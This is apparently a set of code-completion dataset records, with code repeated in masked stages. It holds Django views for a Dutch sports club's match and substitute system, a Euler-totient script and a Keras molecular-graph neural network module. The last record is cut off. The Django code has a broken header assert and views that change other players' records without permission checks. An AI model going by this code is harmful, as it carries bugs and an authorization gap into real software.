Match.DoesNotExist:\n raise Http404\n teams = m.getHercules()\n substituteoptions = False\n substitutes = {}\n for t in teams:\n if m.getSubstitutes(t.pk) != 0:\n substituteoptions = True\n substitutes[t] = m.getSubstitutes(t.pk)\n # raise ValueError\n return render(request, 'viewmatch.html', {'match':m, 'hercules':teams, 'substitutes':substitutes, 'substituteoptions':substituteoptions})\n\n\ndef editMatch(request, match):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n \n try:\n m = Match.objects.get(id=match)\n except Match.DoesNotExist:\n raise Http404\n if request.method == 'POST' and m.isTeam(teampk):\n form = ArrangeSubstitutesForm(request.POST)\n if form.is_valid():\n cd = form.cleaned_data\n # m.substitutesneeded = cd['substitutesneeded']\n m.setSubstitutes(team = teampk, amountsubsneeded = cd['substitutesneeded'])\n m.save()\n return render(request, 'player/editplayer_complete.html')\n else:\n if m.isTeam(teampk):\n form = ArrangeSubstitutesForm(initial={'substitutesneeded': m.getSubstitutesNeeded(teampk)})\n u1 = User.objects.get(username=request.user.username)\n player = u1.get_profile()\n if player.gender == 'V':\n substituteWilling = Player.women.filter(substitutewilling=True)\n elif player.gender == 'M':\n substituteWilling = Player.men.filter(substitutewilling=True)\n presentplayers = m.getPresentPlayers(player.team_member.pk)\n return render(request, 'match.html', {'match':m, 'form': form, 'substitutes':substituteWilling, 'presentplayers':presentplayers})\n\n else:\n raise Http404\n\ndef readMatch(f):\n # with open(f, 'rU') as csvfile:\n # data = csv.reader(csvfile, delimiter=';', dialect=csv.excel_tab)\n # data.next()\n # data = f.read()\n # data = data.splitlines()\n # dialect = csv.Sniffer().sniff(codecs.EncodedFile(f,\"utf-8\").read(1024))\n \n f.open() \n # check whether headers are indicative of a good csv file:\n reader = csv.reader(codecs.EncodedFile(f,\"latin-1\"), delimiter=';', dialect=csv.excel_tab)\n try:\n assert 'Wedstrijdnummer' and 'Wedstrijddatum (niet geformatteerd)' and 'Aanvangstijd' and 'Aanduiding' and \\\n 'Thuis team' and 'Uit team' and 'Sport omschrijving' and 'Veld' and 'Accommodatie naam' and 'Plaats' in reader.next()\n except:\n # mail_admins(\"Foute wedstrijd upload\", \"Probleem met CSV upload\", fail_silently=False)\n return [], \"Foutje: het lijkt geen csv bestand te zijn.\"\n f.close()\n\n # get min and max daterange so cancelled matches can be deleted later on:\n f.open() \n data = csv.DictReader(codecs.EncodedFile(f,\"latin-1\"), delimiter=';', dialect=csv.excel_tab)\n dates = []\n for row in data:\n try:\n date = eu.localize(datetime.strptime((row['Wedstrijddatum (niet geformatteerd)']+\" \" + row['Aanvangstijd']), '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime((row['Wedstrijddatum (niet geformatteerd)']+\" \" + row['Aanvangstijd']), '%d-%m-%Y %H:%M'))\n dates.append(date)\n mindate = min(dates)\n maxdate = max(dates)\n existingmatches = Match.objects.filter(date__lte=maxdate).filter(date__gte=mindate)\n f.close()\n\n # start saving matches\n savedmatches = []\n f.open() \n data = csv.DictReader(codecs.EncodedFile(f,\"latin-1\"), delimiter=';', dialect=csv.excel_tab)\n for row in data:\n if \"Zaal\" in row['Aanduiding']:\n # add locations if not yet existent in the db\n try:\n loca = re.match(r'(.*)\\sveld', row['Veld'])\n hall = loca.group(1)\n loc = Location.objects.get(name=hall)\n #print \"Existing\", loc\n except:\n loc = re.match(r'(.*)\\sveld', row['Veld'])\n loc = Location.objects.create(name=loc.group(1))\n loc.save()\n #add team if not yet existent in the db\n try:\n t1 = Team.objects.get(number=row['Thuis team'])\n except:\n t1 = Team.objects.create(number = row['Thuis team'], level = '99')\n t1.save()\n try:\n t2 = Team.objects.get(number=row['Uit team'])\n except:\n t2 = Team.objects.create(number = row['Uit team'], level = '99')\n t2.save()\n \n # get datetime field:\n try:\n date = eu.localize(datetime.strptime((row['Wedstrijddatum (niet geformatteerd)']+\" \" + row['Aanvangstijd']), '%d-%m-%y %H:%M'))\n except:\n date = eu.localize(datetime.strptime((row['Wedstrijddatum (niet geformatteerd)']+\" \" + row['Aanvangstijd']), '%d-%m-%Y %H:%M'))\n\n #get matches:\n try:\n m = Match.objects.get(nrid=row['Wedstrijdnummer'])\n m.date = date\n m.teamhome = t1\n m.teamaway = t2\n m.location = loc\n m.save()\n savedmatches.append(m)\n #print m\n # saveMatch(m, row[1] + row[2], t1, t2, loc)\n except:\n #print \"except match with %s and %s\" % (t1, t2)\n m = Match(\n nrid=row['Wedstrijdnummer'], \n date = date,\n teamhome = t1,\n teamaway = t2,\n location = loc)\n m.save()\n savedmatches.append(m)\n\n # delete cancelled matches:\n for e in existingmatches:\n if e not in savedmatches:\n e.delete()\n f.close()\n\n return savedmatches, None\n\ndef importMatch(request):\n matches = Match.objects.exclude(date__lte=date.today()).order_by('date')\n if request.method == 'POST':\n form = importMatchesForm(request.POST, request.FILES)\n if form.is_valid():\n savedmatches, fail = readMatch(request.FILES['matches'])\n # request.FILES['matches'].open(\"rb\")\n # portfolio = csv.DictReader(request.FILES['uploadFile'].file)\n return render(request, 'savematch_success.html', {'savedmatches':savedmatches, 'fail': fail})\n else:\n form = importMatchesForm()\n return render(request, 'savematch.html', {'form': form, 'matches': matches})\n\ndef viewMyMatches(request):\n u1 = User.objects.get(username=request.user.username)\n teampk = u1.get_profile().team_member.pk\n matches = Match.objects.get_my_matches(teampk)\n presentmatches = {}\n for m in matches:\n if m.playerPresent(teampk, u1):\n status = 'Aanwezig'\n else:\n status = 'Afwezig'\n presentmatches[m] = MatchPresence(initial = status)\n # raise ValueError\n return render(request, 'mymatches.html', {'mymatches': matches, 'presentmatches':presentmatches})\n\ndef offerSubstitute(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.addSubstitute(teampk = teampk, player = Player.objects.get(pk=substitutepk))\n messages.add_message(request, messages.SUCCESS, 'Je hebt jezelf aangemeld als mogelijke invaller. Goed bezig!!')\n # return render(request, 'substitutewilling_confirmation.html')\n # redirect_url = reverse(viewMatch, args=matchpk,)\n return redirect(reverse(viewMatch, args=(matchpk,))) \n\ndef cancelSubstituteOffer(request, matchpk, teampk, substitutepk):\n match = Match.objects.get(pk=matchpk)\n match.removeSubstitute(teampk=teampk, player =Player.objects.get(pk=substitutepk))\n # return render(request, 'substitutewilling_cancellation.html')\n messages.add_message(request, messages.SUCCESS, 'Je afmelding als mogelijke invaller is doorgegeven.')\n # return render(request, 'substitutewilling_confirmation.html')\n # redirect_url = reverse(viewMatch, args=matchpk,)\n return redirect(reverse(viewMatch, args=(matchpk,))) \n\ndef addMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.addMatchPresence(teampk = teampk, player = Player.objects.get(pk=playerpk))\n messages.add_message(request, messages.SUCCESS, 'Je hebt jezelf aangemeld voor deze wedstrijd!!')\n # return render(request, 'substitutewilling_confirmation.html')\n # redirect_url = reverse(viewMatch, args=matchpk,)\n return redirect(reverse(editMatch, args=(matchpk,))) \n\ndef removeMatchPresence(request, matchpk, teampk, playerpk):\n match = Match.objects.get(pk=matchpk)\n match.removeMatchPresence(teampk=teampk, player =Player.objects.get(pk=playerpk))\n # return render(request, 'substitutewilling_cancellation.html')\n messages.add_message(request, messages.SUCCESS, 'Je afmelding voor deze wedstrijd is doorgegeven.')\n # return render(request, 'substitutewilling_confirmation.html')\n # redirect_url = reverse(viewMatch, args=matchpk,)\n return redirect(reverse(editMatch, args=(matchpk,))) ",
"step-ids": [
6,
8,
9,
11,
13
]
}
|
[
6,
8,
9,
11,
13
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def phi(n):
r = n
d = 2
p = n
while r > 1:
if r % d == 0:
p -= int(r / d)
while r % d == 0:
r = int(r / d)
d += 1
return p
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def phi(n):
r = n
d = 2
p = n
while r > 1:
if r % d == 0:
p -= int(r / d)
while r % d == 0:
r = int(r / d)
d += 1
return p
<|reserved_special_token_0|>
for n in range(2, 1000000):
p = phi(n)
m = max(m, (n / p, n))
if n % 10000 == 0:
print(n)
print(m)
<|reserved_special_token_1|>
def phi(n):
r = n
d = 2
p = n
while r > 1:
if r % d == 0:
p -= int(r / d)
while r % d == 0:
r = int(r / d)
d += 1
return p
m = 0, 1
for n in range(2, 1000000):
p = phi(n)
m = max(m, (n / p, n))
if n % 10000 == 0:
print(n)
print(m)
<|reserved_special_token_1|>
def phi(n):
r = n
d = 2
p = n
while r > 1:
if r % d == 0:
p -= int(r/d)
while r % d == 0:
r = int(r/d)
d += 1
return p
m = (0, 1)
for n in range(2, 1000000):
p = phi(n)
m = max(m, (n/p, n))
if n % 10000 == 0:
print(n)
print(m)
|
flexible
|
{
"blob_id": "e4f97018567559fc2714b75654974fb7c51f770f",
"index": 5266,
"step-1": "<mask token>\n",
"step-2": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r / d)\n while r % d == 0:\n r = int(r / d)\n d += 1\n return p\n\n\n<mask token>\n",
"step-3": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r / d)\n while r % d == 0:\n r = int(r / d)\n d += 1\n return p\n\n\n<mask token>\nfor n in range(2, 1000000):\n p = phi(n)\n m = max(m, (n / p, n))\n if n % 10000 == 0:\n print(n)\nprint(m)\n",
"step-4": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r / d)\n while r % d == 0:\n r = int(r / d)\n d += 1\n return p\n\n\nm = 0, 1\nfor n in range(2, 1000000):\n p = phi(n)\n m = max(m, (n / p, n))\n if n % 10000 == 0:\n print(n)\nprint(m)\n",
"step-5": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r/d)\n while r % d == 0:\n r = int(r/d)\n d += 1\n return p\n\nm = (0, 1)\nfor n in range(2, 1000000):\n p = phi(n)\n m = max(m, (n/p, n))\n if n % 10000 == 0:\n print(n)\n\nprint(m)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class MPNNMessage:
"""Package for sending an MPNN model over pickle"""
def __init__(self, model: tf.keras.Model):
"""
Args:
model: Model to be sent
"""
self.config = model.to_json()
self.weights = [np.array(v) for v in model.get_weights()]
def get_model(self) ->tf.keras.Model:
model = tf.keras.models.model_from_json(self.config, custom_objects
=custom_objects)
model.set_weights(self.weights)
return model
<|reserved_special_token_0|>
class GraphLoader(tf.keras.utils.Sequence):
"""Keras-compatible data loader for training a graph problem"""
def __init__(self, smiles: List[str], atom_types: List[int], bond_types:
List[str], outputs: List[float], batch_size: int, shuffle: bool=
True, random_state: int=None):
"""
Args:
smiles: List of molecules
atom_types: List of known atom types
bond_types: List of known bond types
outputs: List of molecular outputs
batch_size: Number of batches to use to train model
shuffle: Whether to shuffle after each epoch
random_state: Random state for the shuffling
"""
super(GraphLoader, self).__init__()
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,
bond_types) for s in smiles]
self.entries = np.array(list(zip(mols, outputs)))
self.batch_size = batch_size
self.shuffle = shuffle
self.rng = np.random.RandomState(random_state)
if shuffle:
self.rng.shuffle(self.entries)
def __getitem__(self, item):
start = item * self.batch_size
chunk = self.entries[start:start + self.batch_size]
mols, y = zip(*chunk)
x = _merge_batch(mols)
return x, np.array(y)
def __len__(self):
train_size = len(self.entries)
n_batches = train_size // self.batch_size
if train_size % self.batch_size != 0:
n_batches += 1
return n_batches
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MPNNMessage:
"""Package for sending an MPNN model over pickle"""
def __init__(self, model: tf.keras.Model):
"""
Args:
model: Model to be sent
"""
self.config = model.to_json()
self.weights = [np.array(v) for v in model.get_weights()]
def get_model(self) ->tf.keras.Model:
model = tf.keras.models.model_from_json(self.config, custom_objects
=custom_objects)
model.set_weights(self.weights)
return model
def _merge_batch(mols: List[dict]) ->dict:
"""Merge a list of molecules into a single batch
Args:
mols: List of molecules in dictionary format
Returns:
Single batch of molecules
"""
batch = dict((k, np.concatenate([np.atleast_1d(m[k]) for m in mols],
axis=0)) for k in mols[0].keys())
batch_size = len(mols)
mol_id = np.arange(batch_size, dtype=np.int)
batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)
batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)
offset_values = np.zeros(batch_size, dtype=np.int)
np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])
offsets = np.repeat(offset_values, batch['n_bond'], axis=0)
batch['connectivity'] += np.expand_dims(offsets, 1)
return batch
<|reserved_special_token_0|>
class GraphLoader(tf.keras.utils.Sequence):
"""Keras-compatible data loader for training a graph problem"""
def __init__(self, smiles: List[str], atom_types: List[int], bond_types:
List[str], outputs: List[float], batch_size: int, shuffle: bool=
True, random_state: int=None):
"""
Args:
smiles: List of molecules
atom_types: List of known atom types
bond_types: List of known bond types
outputs: List of molecular outputs
batch_size: Number of batches to use to train model
shuffle: Whether to shuffle after each epoch
random_state: Random state for the shuffling
"""
super(GraphLoader, self).__init__()
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,
bond_types) for s in smiles]
self.entries = np.array(list(zip(mols, outputs)))
self.batch_size = batch_size
self.shuffle = shuffle
self.rng = np.random.RandomState(random_state)
if shuffle:
self.rng.shuffle(self.entries)
def __getitem__(self, item):
start = item * self.batch_size
chunk = self.entries[start:start + self.batch_size]
mols, y = zip(*chunk)
x = _merge_batch(mols)
return x, np.array(y)
def __len__(self):
train_size = len(self.entries)
n_batches = train_size // self.batch_size
if train_size % self.batch_size != 0:
n_batches += 1
return n_batches
def update_mpnn(model_msg: MPNNMessage, database: Dict[str, float],
num_epochs: int, atom_types: List[int], bond_types: List[str],
batch_size: int=512, validation_split: float=0.1, random_state: int=1,
learning_rate: float=0.001) ->Tuple[List, dict]:
"""Update a model with new training sets
Args:
model_msg: Serialized version of the model
database: Training dataset of molecule mapped to a property
atom_types: List of known atom types
bond_types: List of known bond types
num_epochs: Number of epochs to run
batch_size: Number of molecules per training batch
validation_split: Fraction of molecules used for the training/validation split
random_state: Seed to the random number generator. Ensures entries do not move between train
and validation set as the database becomes larger
learning_rate: Learning rate for the Adam optimizer
Returns:
model: Updated weights
history: Training history
"""
tf.keras.backend.clear_session()
model = model_msg.get_model()
model.compile(tf.keras.optimizers.Adam(lr=learning_rate),
'mean_absolute_error')
smiles, y = zip(*database.items())
rng = np.random.RandomState(random_state)
train_split = rng.rand(len(smiles)) > validation_split
smiles = np.array(smiles)
y = np.array(y)
train_loader = GraphLoader(smiles[train_split], atom_types, bond_types,
y[train_split], batch_size=batch_size)
val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types,
y[~train_split], batch_size=batch_size, shuffle=False)
history = model.fit(train_loader, epochs=num_epochs, validation_data=
val_loader, verbose=False)
return [np.array(v) for v in model.get_weights()], history.history
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MPNNMessage:
"""Package for sending an MPNN model over pickle"""
def __init__(self, model: tf.keras.Model):
"""
Args:
model: Model to be sent
"""
self.config = model.to_json()
self.weights = [np.array(v) for v in model.get_weights()]
def get_model(self) ->tf.keras.Model:
model = tf.keras.models.model_from_json(self.config, custom_objects
=custom_objects)
model.set_weights(self.weights)
return model
def _merge_batch(mols: List[dict]) ->dict:
"""Merge a list of molecules into a single batch
Args:
mols: List of molecules in dictionary format
Returns:
Single batch of molecules
"""
batch = dict((k, np.concatenate([np.atleast_1d(m[k]) for m in mols],
axis=0)) for k in mols[0].keys())
batch_size = len(mols)
mol_id = np.arange(batch_size, dtype=np.int)
batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)
batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)
offset_values = np.zeros(batch_size, dtype=np.int)
np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])
offsets = np.repeat(offset_values, batch['n_bond'], axis=0)
batch['connectivity'] += np.expand_dims(offsets, 1)
return batch
def evaluate_mpnn(model_msg: MPNNMessage, smiles: List[str], atom_types:
List[int], bond_types: List[str], batch_size: int=128) ->np.ndarray:
"""Run inference on a list of molecules
Args:
model_msg: Serialized version of the model
smiles: List of molecules to evaluate
atom_types: List of known atom types
bond_types: List of known bond types
batch_size: List of molecules to create into matches
Returns:
Predicted value for each molecule
"""
tf.keras.backend.clear_session()
model = model_msg.get_model()
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,
bond_types) for s in smiles]
chunks = [mols[start:start + batch_size] for start in range(0, len(mols
), batch_size)]
batches = [_merge_batch(c) for c in chunks]
outputs = [model.predict_on_batch(b) for b in batches]
return np.vstack(outputs)
class GraphLoader(tf.keras.utils.Sequence):
"""Keras-compatible data loader for training a graph problem"""
def __init__(self, smiles: List[str], atom_types: List[int], bond_types:
List[str], outputs: List[float], batch_size: int, shuffle: bool=
True, random_state: int=None):
"""
Args:
smiles: List of molecules
atom_types: List of known atom types
bond_types: List of known bond types
outputs: List of molecular outputs
batch_size: Number of batches to use to train model
shuffle: Whether to shuffle after each epoch
random_state: Random state for the shuffling
"""
super(GraphLoader, self).__init__()
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,
bond_types) for s in smiles]
self.entries = np.array(list(zip(mols, outputs)))
self.batch_size = batch_size
self.shuffle = shuffle
self.rng = np.random.RandomState(random_state)
if shuffle:
self.rng.shuffle(self.entries)
def __getitem__(self, item):
start = item * self.batch_size
chunk = self.entries[start:start + self.batch_size]
mols, y = zip(*chunk)
x = _merge_batch(mols)
return x, np.array(y)
def __len__(self):
train_size = len(self.entries)
n_batches = train_size // self.batch_size
if train_size % self.batch_size != 0:
n_batches += 1
return n_batches
def update_mpnn(model_msg: MPNNMessage, database: Dict[str, float],
num_epochs: int, atom_types: List[int], bond_types: List[str],
batch_size: int=512, validation_split: float=0.1, random_state: int=1,
learning_rate: float=0.001) ->Tuple[List, dict]:
"""Update a model with new training sets
Args:
model_msg: Serialized version of the model
database: Training dataset of molecule mapped to a property
atom_types: List of known atom types
bond_types: List of known bond types
num_epochs: Number of epochs to run
batch_size: Number of molecules per training batch
validation_split: Fraction of molecules used for the training/validation split
random_state: Seed to the random number generator. Ensures entries do not move between train
and validation set as the database becomes larger
learning_rate: Learning rate for the Adam optimizer
Returns:
model: Updated weights
history: Training history
"""
tf.keras.backend.clear_session()
model = model_msg.get_model()
model.compile(tf.keras.optimizers.Adam(lr=learning_rate),
'mean_absolute_error')
smiles, y = zip(*database.items())
rng = np.random.RandomState(random_state)
train_split = rng.rand(len(smiles)) > validation_split
smiles = np.array(smiles)
y = np.array(y)
train_loader = GraphLoader(smiles[train_split], atom_types, bond_types,
y[train_split], batch_size=batch_size)
val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types,
y[~train_split], batch_size=batch_size, shuffle=False)
history = model.fit(train_loader, epochs=num_epochs, validation_data=
val_loader, verbose=False)
return [np.array(v) for v in model.get_weights()], history.history
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from typing import List, Dict, Tuple
import numpy as np
import tensorflow as tf
from molgym.mpnn.data import convert_nx_to_dict
from molgym.mpnn.layers import custom_objects
from molgym.utils.conversions import convert_smiles_to_nx
class MPNNMessage:
"""Package for sending an MPNN model over pickle"""
def __init__(self, model: tf.keras.Model):
"""
Args:
model: Model to be sent
"""
self.config = model.to_json()
self.weights = [np.array(v) for v in model.get_weights()]
def get_model(self) ->tf.keras.Model:
model = tf.keras.models.model_from_json(self.config, custom_objects
=custom_objects)
model.set_weights(self.weights)
return model
def _merge_batch(mols: List[dict]) ->dict:
"""Merge a list of molecules into a single batch
Args:
mols: List of molecules in dictionary format
Returns:
Single batch of molecules
"""
batch = dict((k, np.concatenate([np.atleast_1d(m[k]) for m in mols],
axis=0)) for k in mols[0].keys())
batch_size = len(mols)
mol_id = np.arange(batch_size, dtype=np.int)
batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)
batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)
offset_values = np.zeros(batch_size, dtype=np.int)
np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])
offsets = np.repeat(offset_values, batch['n_bond'], axis=0)
batch['connectivity'] += np.expand_dims(offsets, 1)
return batch
def evaluate_mpnn(model_msg: MPNNMessage, smiles: List[str], atom_types:
List[int], bond_types: List[str], batch_size: int=128) ->np.ndarray:
"""Run inference on a list of molecules
Args:
model_msg: Serialized version of the model
smiles: List of molecules to evaluate
atom_types: List of known atom types
bond_types: List of known bond types
batch_size: List of molecules to create into matches
Returns:
Predicted value for each molecule
"""
tf.keras.backend.clear_session()
model = model_msg.get_model()
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,
bond_types) for s in smiles]
chunks = [mols[start:start + batch_size] for start in range(0, len(mols
), batch_size)]
batches = [_merge_batch(c) for c in chunks]
outputs = [model.predict_on_batch(b) for b in batches]
return np.vstack(outputs)
class GraphLoader(tf.keras.utils.Sequence):
"""Keras-compatible data loader for training a graph problem"""
def __init__(self, smiles: List[str], atom_types: List[int], bond_types:
List[str], outputs: List[float], batch_size: int, shuffle: bool=
True, random_state: int=None):
"""
Args:
smiles: List of molecules
atom_types: List of known atom types
bond_types: List of known bond types
outputs: List of molecular outputs
batch_size: Number of batches to use to train model
shuffle: Whether to shuffle after each epoch
random_state: Random state for the shuffling
"""
super(GraphLoader, self).__init__()
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types,
bond_types) for s in smiles]
self.entries = np.array(list(zip(mols, outputs)))
self.batch_size = batch_size
self.shuffle = shuffle
self.rng = np.random.RandomState(random_state)
if shuffle:
self.rng.shuffle(self.entries)
def __getitem__(self, item):
start = item * self.batch_size
chunk = self.entries[start:start + self.batch_size]
mols, y = zip(*chunk)
x = _merge_batch(mols)
return x, np.array(y)
def __len__(self):
train_size = len(self.entries)
n_batches = train_size // self.batch_size
if train_size % self.batch_size != 0:
n_batches += 1
return n_batches
def update_mpnn(model_msg: MPNNMessage, database: Dict[str, float],
num_epochs: int, atom_types: List[int], bond_types: List[str],
batch_size: int=512, validation_split: float=0.1, random_state: int=1,
learning_rate: float=0.001) ->Tuple[List, dict]:
"""Update a model with new training sets
Args:
model_msg: Serialized version of the model
database: Training dataset of molecule mapped to a property
atom_types: List of known atom types
bond_types: List of known bond types
num_epochs: Number of epochs to run
batch_size: Number of molecules per training batch
validation_split: Fraction of molecules used for the training/validation split
random_state: Seed to the random number generator. Ensures entries do not move between train
and validation set as the database becomes larger
learning_rate: Learning rate for the Adam optimizer
Returns:
model: Updated weights
history: Training history
"""
tf.keras.backend.clear_session()
model = model_msg.get_model()
model.compile(tf.keras.optimizers.Adam(lr=learning_rate),
'mean_absolute_error')
smiles, y = zip(*database.items())
rng = np.random.RandomState(random_state)
train_split = rng.rand(len(smiles)) > validation_split
smiles = np.array(smiles)
y = np.array(y)
train_loader = GraphLoader(smiles[train_split], atom_types, bond_types,
y[train_split], batch_size=batch_size)
val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types,
y[~train_split], batch_size=batch_size, shuffle=False)
history = model.fit(train_loader, epochs=num_epochs, validation_data=
val_loader, verbose=False)
return [np.array(v) for v in model.get_weights()], history.history
<|reserved_special_token_1|>
"""Functions for updating and performing bulk inference using an Keras MPNN model"""
from typing import List, Dict, Tuple
import numpy as np
import tensorflow as tf
from molgym.mpnn.data import convert_nx_to_dict
from molgym.mpnn.layers import custom_objects
from molgym.utils.conversions import convert_smiles_to_nx
# TODO (wardlt): Make this Keras message object usable elsewhere
class MPNNMessage:
"""Package for sending an MPNN model over pickle"""
def __init__(self, model: tf.keras.Model):
"""
Args:
model: Model to be sent
"""
self.config = model.to_json()
# Makes a copy of the weights to ensure they are not memoryview objects
self.weights = [np.array(v) for v in model.get_weights()]
def get_model(self) -> tf.keras.Model:
model = tf.keras.models.model_from_json(self.config, custom_objects=custom_objects)
model.set_weights(self.weights)
return model
def _merge_batch(mols: List[dict]) -> dict:
"""Merge a list of molecules into a single batch
Args:
mols: List of molecules in dictionary format
Returns:
Single batch of molecules
"""
# Convert arrays to array
# Stack the values from each array
batch = dict(
(k, np.concatenate([np.atleast_1d(m[k]) for m in mols], axis=0))
for k in mols[0].keys()
)
# Compute the mappings from bond index to graph index
batch_size = len(mols)
mol_id = np.arange(batch_size, dtype=np.int)
batch['node_graph_indices'] = np.repeat(mol_id, batch['n_atom'], axis=0)
batch['bond_graph_indices'] = np.repeat(mol_id, batch['n_bond'], axis=0)
# Compute offsets for the connectivity matrix
offset_values = np.zeros(batch_size, dtype=np.int)
np.cumsum(batch['n_atom'][:-1], out=offset_values[1:])
offsets = np.repeat(offset_values, batch['n_bond'], axis=0)
batch['connectivity'] += np.expand_dims(offsets, 1)
return batch
def evaluate_mpnn(model_msg: MPNNMessage, smiles: List[str],
atom_types: List[int], bond_types: List[str], batch_size: int = 128) -> np.ndarray:
"""Run inference on a list of molecules
Args:
model_msg: Serialized version of the model
smiles: List of molecules to evaluate
atom_types: List of known atom types
bond_types: List of known bond types
batch_size: List of molecules to create into matches
Returns:
Predicted value for each molecule
"""
# Rebuild the model
tf.keras.backend.clear_session()
model = model_msg.get_model()
# Convert all SMILES strings to batches of molecules
# TODO (wardlt): Use multiprocessing. Could benefit from a persistent Pool to avoid loading in TF many times
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types, bond_types) for s in smiles]
chunks = [mols[start:start + batch_size] for start in range(0, len(mols), batch_size)]
batches = [_merge_batch(c) for c in chunks]
# Feed the batches through the MPNN
outputs = [model.predict_on_batch(b) for b in batches]
return np.vstack(outputs)
# TODO (wardlt): Move to the MPNN library?
class GraphLoader(tf.keras.utils.Sequence):
"""Keras-compatible data loader for training a graph problem"""
def __init__(self, smiles: List[str], atom_types: List[int], bond_types: List[str],
outputs: List[float], batch_size: int, shuffle: bool = True, random_state: int = None):
"""
Args:
smiles: List of molecules
atom_types: List of known atom types
bond_types: List of known bond types
outputs: List of molecular outputs
batch_size: Number of batches to use to train model
shuffle: Whether to shuffle after each epoch
random_state: Random state for the shuffling
"""
super(GraphLoader, self).__init__()
# Convert the molecules to MPNN-ready formats
mols = [convert_nx_to_dict(convert_smiles_to_nx(s), atom_types, bond_types) for s in smiles]
self.entries = np.array(list(zip(mols, outputs)))
# Other data
self.batch_size = batch_size
self.shuffle = shuffle
# Give it a first shuffle, if needed
self.rng = np.random.RandomState(random_state)
if shuffle:
self.rng.shuffle(self.entries)
def __getitem__(self, item):
# Get the desired chunk of entries
start = item * self.batch_size
chunk = self.entries[start:start + self.batch_size]
# Get the molecules and outputs out
mols, y = zip(*chunk)
x = _merge_batch(mols)
return x, np.array(y)
def __len__(self):
# Get the number of batches
train_size = len(self.entries)
n_batches = train_size // self.batch_size
# Add a partially-full batch at the end
if train_size % self.batch_size != 0:
n_batches += 1
return n_batches
# TODO (wardlt): Evaluate whether the model stays in memory after training. If so, clear graph?
def update_mpnn(model_msg: MPNNMessage, database: Dict[str, float], num_epochs: int,
atom_types: List[int], bond_types: List[str], batch_size: int = 512,
validation_split: float = 0.1, random_state: int = 1, learning_rate: float = 1e-3)\
-> Tuple[List, dict]:
"""Update a model with new training sets
Args:
model_msg: Serialized version of the model
database: Training dataset of molecule mapped to a property
atom_types: List of known atom types
bond_types: List of known bond types
num_epochs: Number of epochs to run
batch_size: Number of molecules per training batch
validation_split: Fraction of molecules used for the training/validation split
random_state: Seed to the random number generator. Ensures entries do not move between train
and validation set as the database becomes larger
learning_rate: Learning rate for the Adam optimizer
Returns:
model: Updated weights
history: Training history
"""
# Rebuild the model
tf.keras.backend.clear_session()
model = model_msg.get_model()
model.compile(tf.keras.optimizers.Adam(lr=learning_rate), 'mean_absolute_error')
# Separate the database into molecules and properties
smiles, y = zip(*database.items())
# Make the training and validation splits
# Use a random number generator with fixed seed to ensure that the validation
# set is never polluted with entries from the training set
# TODO (wardlt): Replace with passing train and validation separately?
rng = np.random.RandomState(random_state)
train_split = rng.rand(len(smiles)) > validation_split
# Make the loaders
smiles = np.array(smiles)
y = np.array(y)
train_loader = GraphLoader(smiles[train_split], atom_types, bond_types, y[train_split],
batch_size=batch_size)
val_loader = GraphLoader(smiles[~train_split], atom_types, bond_types, y[~train_split],
batch_size=batch_size, shuffle=False)
# Run the desired number of epochs
# TODO (wardlt): Should we use callbacks to get only the "best model" based on the validation set?
history = model.fit(train_loader, epochs=num_epochs, validation_data=val_loader, verbose=False)
return [np.array(v) for v in model.get_weights()], history.history
|
flexible
|
{
"blob_id": "95ab8fce573ef959946d50d9af6e893cb8798917",
"index": 6714,
"step-1": "<mask token>\n\n\nclass MPNNMessage:\n \"\"\"Package for sending an MPNN model over pickle\"\"\"\n\n def __init__(self, model: tf.keras.Model):\n \"\"\"\n Args:\n model: Model to be sent\n \"\"\"\n self.config = model.to_json()\n self.weights = [np.array(v) for v in model.get_weights()]\n\n def get_model(self) ->tf.keras.Model:\n model = tf.keras.models.model_from_json(self.config, custom_objects\n =custom_objects)\n model.set_weights(self.weights)\n return model\n\n\n<mask token>\n\n\nclass GraphLoader(tf.keras.utils.Sequence):\n \"\"\"Keras-compatible data loader for training a graph problem\"\"\"\n\n def __init__(self, smiles: List[str], atom_types: List[int], bond_types:\n List[str], outputs: List[float], batch_size: int, shuffle: bool=\n True, random_state: int=None):\n \"\"\"\n\n Args:\n smiles: List of molecules\n atom_types: List of known atom types\n bond_types: List of known bond types\n outputs: List of molecular outputs\n batch_size: Number of batches to use to train model\n shuffle: Whether to shuffle after each epoch\n random_state: Random state for the shuffling\n \"\"\"\n super(GraphLoader, 